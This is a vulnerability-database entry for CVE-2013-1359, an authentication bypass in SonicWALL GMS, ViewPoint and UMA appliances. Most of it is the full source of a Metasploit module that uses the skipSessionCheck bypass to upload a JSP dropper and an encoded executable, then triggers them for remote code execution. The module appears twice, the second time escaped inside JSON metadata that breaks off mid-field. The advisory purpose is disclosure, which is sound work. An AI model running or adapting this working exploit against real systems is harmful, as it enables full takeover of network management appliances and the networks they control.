var-202002-0532
Vulnerability from variot
An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ##
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
web site for more information on licensing and terms of use.
http://metasploit.com/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in SonicWALL GMS. It exploits two
vulnerabilities in order to get its objective. An authentication bypass in the
Web Administration interface allows to abuse the "appliance" application and upload
an arbitrary payload embedded in a JSP. The module has been tested successfully on
SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
successfully while testing, shell payload have been used.
},
'Author' =>
[
'Nikolas Sotiriu', # Vulnerability Discovery
'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1359'],
[ 'OSVDB', '89347' ],
[ 'BID', '57445' ],
[ 'EDB', '24204' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Targets' =>
[
[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 17 2012'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
], self.class)
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end
def generate_jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
var_data = Rex::Text.rand_text_alpha(rand(8)+8)
var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)
jspraw = "<%@ page import=\"java.io.*\" %>\n"
jspraw << "<%\n"
jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
jspraw << "String #{var_data} = \"\";\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
jspraw << "}\n"
jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
jspraw << "#{var_inputstream}.close();\n"
jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
jspraw << "{\n"
jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
jspraw << "#{var_comb} <<= 4;\n"
jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
jspraw << "}\n"
jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
jspraw << "#{var_outputstream}.close();\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
jspraw << "String[] #{var_fperm} = new String[3];\n"
jspraw << "#{var_fperm}[0] = \"chmod\";\n"
jspraw << "#{var_fperm}[1] = \"+x\";\n"
jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
# Linux and other UNICES allow removing files while they are in use...
jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
jspraw << "} else {\n"
# Windows does not ..
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
jspraw << "%>\n"
return jspraw
end
def get_install_path
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'connection' => 'TE, close',
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'vars_post' => {
'num' => '123456',
'action' => 'show_diagnostics',
'task' => 'search',
'item' => 'application_log',
'criteria' => '*.*',
'width' => '500'
}
})
if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
return $1
end
return nil
end
def upload_file(location, filename, contents)
post_data = Rex::MIME::Message.new
post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'connection' => 'TE, close'
})
if res and res.code == 200 and res.body.empty?
return true
else
return false
end
end
def check
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
if get_install_path.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
# Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...")
install_path = get_install_path
if install_path.nil?
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
end
print_good("#{@peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "linux"
@location = "#{install_path}webapps/appliance/"
elsif target['Platform'] == "win"
@location = "#{install_path}webapps\\appliance\\"
end
# Upload the JSP and the raw payload
@jsp_name = rand_text_alphanumeric(8+rand(8))
jspraw = generate_jsp
# Specify the payload in hex as an extra file..
payload_hex = payload.encoded_exe.unpack('H*')[0]
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
end
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
end
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/#{@jsp_name}.jsp",
'method' => 'GET'
})
if res and res.code != 200
print_warning("#{@peer} - Error triggering the payload")
end
register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
end
end
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0532", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "analyzer", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "4.1" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.1" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.1" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "4.1" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.0" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "viewpoint", "scope": "eq", "trust": 0.8, "vendor": "sonicwall", "version": "5.1" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "NVD", "id": "CVE-2013-1359" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-1359" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nikolas Sotiriu", "sources": [ { "db": "BID", "id": "57445" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ], "trust": 0.9 }, "cve": "CVE-2013-1359", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2013-007224", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-61361", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2013-007224", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2013-1359", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2013-007224", "trust": 0.8, "value": "Critical" }, { "author": "CNNVD", "id": "CNNVD-201301-377", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-61361", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \nAttackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. \nThe following versions are affected:\nGMS/Analyzer/UMA 7.0.x\nGMS/ViewPoint/UMA 6.0.x\nGMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x\nGMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ##\n# This file is part of the Metasploit Framework and may be subject to\n# redistribution and commercial restrictions. Please see the Metasploit\n# web site for more information on licensing and terms of use. \n# http://metasploit.com/\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\tRank = GoodRanking\n\n\tHttpFingerprint = { :pattern =\u003e [ /Apache-Coyote/ ] }\n\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Exploit::EXE\n\tinclude Msf::Exploit::FileDropper\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t\u0027Name\u0027 =\u003e \u0027SonicWALL GMS 6 Arbitrary File Upload\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\t\tThis module exploits a code execution flaw in SonicWALL GMS. It exploits two\n\t\t\t\tvulnerabilities in order to get its objective. An authentication bypass in the\n\t\t\t\tWeb Administration interface allows to abuse the \"appliance\" application and upload\n\t\t\t\tan arbitrary payload embedded in a JSP. The module has been tested successfully on\n\t\t\t\tSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\n\t\t\t\tAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn\u0027t run\n\t\t\t\tsuccessfully while testing, shell payload have been used. \n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t\u0027Nikolas Sotiriu\u0027, # Vulnerability Discovery\n\t\t\t\t\t\u0027Julian Vilas \u003cjulian.vilas[at]gmail.com\u003e\u0027, # Metasploit module\n\t\t\t\t\t\u0027juan vazquez\u0027 # Metasploit module\n\t\t\t\t],\n\t\t\t\u0027License\u0027 =\u003e MSF_LICENSE,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272013-1359\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u002789347\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u002757445\u0027 ],\n\t\t\t\t\t[ \u0027EDB\u0027, \u002724204\u0027 ]\n\t\t\t\t],\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Platform\u0027 =\u003e [ \u0027win\u0027, \u0027linux\u0027 ],\n\t\t\t\u0027Targets\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t[ \u0027SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027linux\u0027\n\t\t\t\t\t\t}\n\t\t\t\t\t]\n\t\t\t\t],\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0,\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Jan 17 2012\u0027))\n\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOpt::RPORT(80),\n\t\t\t\tOptString.new(\u0027TARGETURI\u0027, [true, \u0027Path to SonicWall GMS\u0027, \u0027/\u0027])\n\t\t\t], self.class)\n\tend\n\n\n\tdef on_new_session\n\t\t# on_new_session will force stdapi to load (for Linux meterpreter)\n\tend\n\n\n\tdef generate_jsp\n\t\tvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_data = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_counter = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_comb = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exe = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\t@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_proc = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8)\n\n\t\tjspraw = \"\u003c%@ page import=\\\"java.io.*\\\" %\u003e\\n\"\n\t\tjspraw \u003c\u003c \"\u003c%\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_data} = \\\"\\\";\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\"\n\t\tjspraw \u003c\u003c \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\"\n\t\tjspraw \u003c\u003c \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\"\n\n\t\tjspraw \u003c\u003c \"int #{var_numbytes} = #{var_inputstream}.available();\\n\"\n\t\tjspraw \u003c\u003c \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.read(#{var_bytearray});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\"\n\t\tjspraw \u003c\u003c \"for (int #{var_counter} = 0; #{var_counter} \u003c #{var_numbytes}; #{var_counter} += 2)\\n\"\n\t\tjspraw \u003c\u003c \"{\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\"\n\t\tjspraw \u003c\u003c \"int #{var_comb} = Character.digit(#{var_char1}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} \u003c\u003c= 4;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} += Character.digit(#{var_char2}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.write(#{var_bytes});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\"\n\t\tjspraw \u003c\u003c \"String[] #{var_fperm} = new String[3];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[0] = \\\"chmod\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[1] = \\\"+x\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[2] = #{var_exepath};\\n\"\n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\"\n\t\tjspraw \u003c\u003c \"if (#{var_proc}.waitFor() == 0) {\\n\"\n\t\tjspraw \u003c\u003c \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\t\t# Linux and other UNICES allow removing files while they are in use... \n\t\tjspraw \u003c\u003c \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\"\n\t\tjspraw \u003c\u003c \"} else {\\n\"\n\t\t# Windows does not .. \n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"%\u003e\\n\"\n\t\treturn jspraw\n\tend\n\n\tdef get_install_path\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027connection\u0027 =\u003e \u0027TE, close\u0027,\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027TE\u0027 =\u003e \"deflate,gzip;q=0.3\",\n\t\t\t\t\t},\n\t\t\t\t\u0027vars_post\u0027 =\u003e {\n\t\t\t\t\t\u0027num\u0027 =\u003e \u0027123456\u0027,\n\t\t\t\t\t\u0027action\u0027 =\u003e \u0027show_diagnostics\u0027,\n\t\t\t\t\t\u0027task\u0027 =\u003e \u0027search\u0027,\n\t\t\t\t\t\u0027item\u0027 